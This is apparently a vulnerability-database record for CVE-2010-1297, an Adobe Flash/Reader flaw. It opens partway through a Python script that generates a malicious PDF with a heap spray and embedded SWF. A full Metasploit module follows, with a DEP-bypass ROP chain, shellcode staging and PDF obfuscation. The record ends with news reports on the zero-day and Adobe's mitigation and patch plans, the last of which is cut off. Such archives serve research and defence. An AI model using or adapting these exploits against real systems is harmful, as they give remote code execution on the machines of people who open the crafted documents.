unescape("%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030");\r\n pointerSled = unescape("<Contents>");\r\n while (pointerSled.length < chunk_size)\r\n pointerSled += pointerSled;\r\n pointerSled_len = chunk_size - (pointers.length + 20); \r\n pointerSled = pointerSled.substring(0, pointerSled_len);\r\n heap_chunks = new Array();\r\n for (var i = 0 ; i < <CHUNKS> ; i++)\r\n heap_chunks[i] = pointerSled + pointers;\r\n } \r\n \r\n \r\n spray_heap(); \r\n '''\r\n\t\t\r\n spray = spray.replace('<Contents>', '%u33dd%u3030') # Pointer to XCHG ESP , EBX\r\n '''\r\nAuthplay.dll\r\n\t\t\r\n303033DD ? 87DC XCHG ESP,EBX\r\n\r\n#############################################################\r\n\t\t\t\t\t will do nothing\t\r\n\r\n303033DF ? 45 INC EBP\r\n303033E0 ? 05 00898784 ADD EAX,84878900 \r\n303033E5 ? 42 INC EDX\r\n303033E6 ? 05 008987E8 ADD EAX,E8878900\r\n303033EB ? 41 INC ECX\r\n303033EC ? 05 008987EC ADD EAX,EC878900\r\n303033F1 ? 41 INC ECX\r\n303033F2 ? 05 008987F0 ADD EAX,F0878900\r\n303033F7 ? 41 INC ECX\r\n303033F8 ? 05 008987F4 ADD EAX,F4878900\r\n303033FD ? 41 INC ECX\r\n303033FE ? 05 005F5E5D ADD EAX,5D5E5F00\r\n30303403 . B8 01000000 MOV EAX,1\r\n30303408 . 5B POP EBX\r\n############################################################\r\n\r\n30303409 . 83C4 30 ADD ESP,30\r\n3030340C . C3 RETN\r\n\r\n '''\r\n\r\n spray = spray.replace('<CHUNKS>', '40') #Chunk count\r\n return spray\r\n\t\t\r\ndef generate_pdf():\r\n\texploit = Exploit()\r\n\tswfFile = 'exploit.swf'\r\n\tpdf = PDF()\r\n\tpdf.header()\r\n\tpdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1)\r\n\t#pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)\r\n\tpdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)\r\n\tpdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1)\r\n\tpdf.obj_Stream(4, '','')\r\n\tpdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)\r\n\tpdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) \r\n\tpdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)\r\n\tpdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1)\t\r\n\tpdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1)\t\r\n\tpdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1)\t\r\n\tpdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1)\t\r\n\tpdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1)\t\r\n\tpdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)\r\n\tpdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() ) \r\n\tpdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)\r\n\tpdf.obj_Stream(16, '<</Length 0 >> ','') \r\n\tpdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1) \r\n\t\r\n\tpdf.xref()\r\n\tpdf.trailer()\r\n\treturn pdf.generate()\r\n\t\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint 'Usage: python %s [output file name]' % sys.argv[0]\r\n\t\tsys.exit(0)\r\n\tfile_name = sys.argv[1]\r\n\tif not file_name.endswith('.pdf'):\r\n\t\tfile_name = file_name + '.pdf'\r\n\ttry:\r\n\t\tfd = open(file_name, 'wb+')\r\n\t\tfd.write(generate_pdf())\r\n\t\tfd.close()\r\n\t\tprint '[-] PDF file generated and written to %s' % file_name\r\n\texcept IOError:\r\n\t\tprint '[*] Error : An IO error has occurred'\r\n\t\tprint '[-] Exiting ...'\r\n\t\tsys.exit(-1)\r\nif __name__ == '__main__':\r\n\tmain()\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-87100"}, {"lastseen": "2017-11-19T16:50:31", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71128", "id": "SSV:71128", "sourceData": "\n ##\r\n# $Id: adobe_flashplayer_newfunction.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the DoABC tag handling within\r\n\t\t\t\tversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\r\n\t\t\t\tvulnerable, as are any other applications that may embed Flash player.\r\n\r\n\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\r\n\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\r\n\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\r\n\r\n\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\r\n\t\t\t\tadobe_libtiff module. This method is unlikely to work across various\r\n\t\t\t\tWindows versions due a the hardcoded syscall number.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Found being openly exploited\r\n\t\t\t\t\t'jduck' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-1297'],\r\n\t\t\t\t\t['OSVDB', '65141'],\r\n\t\t\t\t\t['BID', '40586'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],\r\n\t\t\t\t\t# For SWF->PDF embedding\r\n\t\t\t\t\t['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true,\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => "\\x00",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 04 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# load the static swf file\r\n\t\tpath = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2010-1297.swf" )\r\n\t\tfd = File.open( path, "rb" )\r\n\t\t@swf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tprint_status("Sending crafted PDF w/SWF to #{cli.peerhost}:#{cli.peerport}")\r\n\r\n\t\tjs_data = make_js(regenerate_payload(cli).encoded)\r\n\t\tpdf_data = make_pdf(@swf_data, js_data)\r\n\t\tsend_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using BIB.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x70048ef, # xchg eax,esp / ret\r\n\t\t\t0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009033, # ret 0x18\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7001599, # pop ebp / ret\r\n\t\t\t0x10124,\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10104,\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x1000,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x7ffe0300, # -- location of KiFastSystemCall\r\n\t\t\t0x7007fb2, # mov eax, [ecx] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10100,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\r\n\t\t\t0x7005c54, # pop esi / add esp,0x14 / ret\r\n\t\t\t0xffffffff,\r\n\t\t\t0x10100,\r\n\t\t\t0x0,\r\n\t\t\t0x10104,\r\n\t\t\t0x1000,\r\n\t\t\t0x40,\r\n\t\t\t# The next bit effectively copies data from the interleaved stack to the memory\r\n\t\t\t# pointed to by eax\r\n\t\t\t# The data copied is:\r\n\t\t\t# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\r\n\t\t\t# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\r\n\t\t\t# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x9054905a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5815eb5a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x18891a8b,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x8304c083,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xfb8104c2,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5ebee75,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xffffe6e8,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x909090ff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90ffffff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x700112f # call eax -- (execute stub to transition to full shellcode)\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = ""\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t"%d 0 obj\\n" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t"%d 0 R" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = ""\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << "#%x" % c.unpack("C*")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = ""\r\n\t\twhitespace = ""\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << "%02x" % b\r\n\t\t\twhitespace = " " * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << ">"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(swf, js)\r\n\r\n\t\tswf_name = rand_text_alpha(8 + rand(8)) + ".swf"\r\n\r\n\t\txref = []\r\n\t\teol = "\\n"\r\n\t\tendobj = "endobj" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = "%PDF-1.5" << eol\r\n\t\t#pdf << "%" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu("<</Type/Catalog")\r\n\t\tpdf << nObfu("/Pages ") << ioRef(3)\r\n\t\tpdf << nObfu("/OpenAction ") << ioRef(5)\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu("<</Type/Pages/Count 1/Kids [") << ioRef(4) << nObfu("]>>") << eol << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3)\r\n\t\tpdf << nObfu("/Annots [") << ioRef(7) << nObfu("] ")\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << eol << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol\r\n\t\tpdf << "stream" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << "endstream" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# swf annotation object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu("<</Type/Annot/Subtype/RichMedia")\r\n\t\tpdf << nObfu("/Rect [20 20 187 69] ")\r\n\t\tpdf << nObfu("/RichMediaSettings ") << ioRef(8)\r\n\t\tpdf << nObfu("/RichMediaContent ") << ioRef(9)\r\n\t\tpdf << nObfu("/NM (") << swf_name << nObfu(")")\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media settings\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8)\r\n\t\tpdf << nObfu("<</Type/RichMediaSettings/Subtype/Flash")\r\n\t\tpdf << nObfu("/Activation ") << ioRef(10)\r\n\t\tpdf << nObfu("/Deactivation ") << ioRef(11)\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media content\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9)\r\n\t\tpdf << nObfu("<</Type/RichMediaContent")\r\n\t\tpdf << nObfu("/Assets ") << ioRef(12)\r\n\t\tpdf << nObfu("/Configurations [") << ioRef(14) << "]"\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media activation / deactivation\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(10)\r\n\t\tpdf << nObfu("<</Type/RichMediaActivation/Condition/PO>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11)\r\n\t\tpdf << nObfu("<</Type/RichMediaDeactivation/Condition/XD>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media assets\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(12)\r\n\t\tpdf << nObfu("<</Names [(#{swf_name}) ") << ioRef(13) << nObfu("]>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf embeded file ref\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu("<</Type/Filespec /EF <</F ") << ioRef(16) << nObfu(">> /F(#{swf_name})>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media configuration\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14)\r\n\t\tpdf << nObfu("<</Type/RichMediaConfiguration/Subtype/Flash")\r\n\t\tpdf << nObfu("/Instances [") << ioRef(15) << nObfu("]>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media isntance\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(15)\r\n\t\tpdf << nObfu("<</Type/RichMediaInstance/Subtype/Flash")\r\n\t\tpdf << nObfu("/Asset ") << ioRef(13)\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf stream\r\n\t\t# NOTE: This data is already compressed, no need to compress it again...\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(16) << nObfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol\r\n\t\tpdf << "stream" << eol\r\n\t\tpdf << swf << eol\r\n\t\tpdf << "endstream" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << "xref" << eol\r\n\t\tpdf << "0 %d" % (xref.length + 1) << eol\r\n\t\tpdf << "0000000000 65535 f" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << "%010d 00000 n" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << "trailer" << eol\r\n\t\tpdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol\r\n\r\n\t\tpdf << "startxref" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << "%%EOF" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71128"}], "threatpost": [{"lastseen": "2018-10-06T23:07:40", "bulletinFamily": "info", "cvelist": ["CVE-2010-1297"], "description": "[](<https://threatpost.com/adobe-warns-flash-pdf-zero-day-attack-060410/>)Adobe issued an alert late Friday night to warn about zero-day attacks against an unpatched vulnerability in its Reader and Flash Player software products.\n\nThe vulnerability, described as critical, affects Adobe Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems.\n\nIt also affects the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows, Macintosh and UNIX operating systems, Adobe said.\n\nFrom [Adobe\u2019s advisory](<http://www.adobe.com/support/security/advisories/apsa10-01.html>):\n\n_This vulnerability (CVE-2010-1297) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat._\n\nThe Flash Player 10.1 Release Candidate \u201cdoes not appear to be vulnerable,\u201d the company said.\n\n**Mitigation Guidance**\n\nIn the absence of a patch, Adobe recommends deleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat 9.x. This will mitigate the threat but users will experience a non-exploitable crash or error message when opening a PDF file that contains SWF content.\n\nThe authplay.dll that ships with Adobe Reader and Acrobat 9.x for Windows is typically located at C:Program FilesAdobeReader 9.0Readerauthplay.dll for Adobe Reader or C:Program FilesAdobeAcrobat 9.0Acrobatauthplay.dll for Acrobat.\n\nAdobe Reader and Acrobat 8.x are confirmed not vulnerable.\n\nAdobe security chief Brad Arkin said the company received the first malicious sample around 10:30 AM on Friday. There is no information on when a patch will be available.\n", "modified": "2018-08-15T12:37:40", "published": "2010-06-05T03:10:19", "id": "THREATPOST:F7E082438478997F07E358DD1CB69C57", "href": "https://threatpost.com/adobe-warns-flash-pdf-zero-day-attack-060410/74069/", "type": "threatpost", "title": "Adobe Warns of Flash, PDF Zero Day Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:40", "bulletinFamily": "info", "cvelist": ["CVE-2010-1297"], "description": "[](<https://threatpost.com/adobe-release-flash-patch-june-10-060810/>)Adobe said on Monday that it will have a patch available for the [newly discovered critical vulnerability in Flash](<https://threatpost.com/adobe-warns-flash-pdf-zero-day-attack-060410/>) ready by June 10 for most platforms. The patches for Adobe Reader and Acrobat, which also are affected by the flaw, won\u2019t be released until June 29.\n\nThe new flaw was discovered late last week and Adobe security officials said that they were aware of attacks against the vulnerability in the wild. Adobe usually distributes its patches on a quarterly basis, but Brad Arkin, the company\u2019s director of product security and privacy, said in a [blog post Monday night](<http://blogs.adobe.com/asset/2010/06/background_on_apsa10-01_patch.html>) that the company decided to push the releases up.\n\nThe June 29, 2010 security update for Adobe Reader and Acrobat \nrepresents an accelerated release of the next quarterly security update \noriginally scheduled for July 13, 2010. In addition to addressing \nCVE-2010-1297, the accelerated next quarterly Adobe Reader and Acrobat \nupdate will also resolve a number of responsibly disclosed \nvulnerabilities. The full details will be in the Security Bulletin and \nRelease Notes we will publish when the security update is posted.\n\nAmong other options, we also considered the alternative of releasing a \none-off 0-day fix followed a couple of weeks later by the July 13 \nquarterly update. However, two patches within three weeks would have \nincurred too much churn and patch management overhead on our users, in \nparticular for customers with large managed environments.\n\nThe patch for Flash released on June 10 will address the vulnerability on Windows, Mac and Linux. The release date for a Flash patch for Solaris has not been determined yet. Also on Monday Adobe released [updated mitigation guidance](<http://www.adobe.com/support/security/advisories/apsa10-01.html>) for users looking to thwart attacks before the patch is available. \n\nFor Windows users:\n\nDeleting, renaming, or removing access to the authplay.dll file that \nships with Adobe Reader 9.x and \nAcrobat 9.x mitigates the threat for those products, but users \nwill experience a non-exploitable \ncrash or error message when opening a PDF file that contains \nSWF content. \n\nThe authplay.dll that ships with Adobe Reader 9.x and Acrobat \n9.x for Windows is typically located at C:Program FilesAdobeReader \n9.0Readerauthplay.dll for Adobe Reader or C:Program \nFilesAdobeAcrobat 9.0Acrobatauthplay.dll for Acrobat.\n\nFor Mac users, the guidance is specific to each vulnerable application and can be found in [Adobe\u2019s 